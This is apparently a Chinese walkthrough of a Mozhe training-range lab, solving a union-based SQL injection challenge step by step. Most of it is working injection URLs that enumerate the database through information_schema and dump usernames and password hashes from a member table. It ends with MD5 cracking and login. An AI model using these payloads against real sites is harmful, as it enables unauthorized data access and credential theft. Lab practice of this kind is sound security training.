墨者学习
By/shy014
地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
1.登陆墨者靶场,选择该靶机,启用靶机
2.进入靶场发现熟悉的通告
3.测试存在SQL注入漏洞
http://219.153.49.228:45391/new_list.php?id=1%20and%201=2
4.判断列
http://219.153.49.228:45391/new_list.php?id=1%20order%20by%204
5.判断回显位置
http://219.153.49.228:45391/new_list.php?id=-1%20union%20select%201,2,3,4
6.确定当前用户名和数据库
http://219.153.49.228:45391/new_list.php?id=-1%20union%20select%201,database(),user(),4
7.读取库名
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--+
8.读取表名
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='sys'--+
这张表不是
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'--+
9.读取字段
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'--+
10.读取内容
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(id,name,password,status),3,4 from StormGroup_member--+
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(id,name,password),3,4 from StormGroup_member--+
11.MD5解密
12.登陆获取key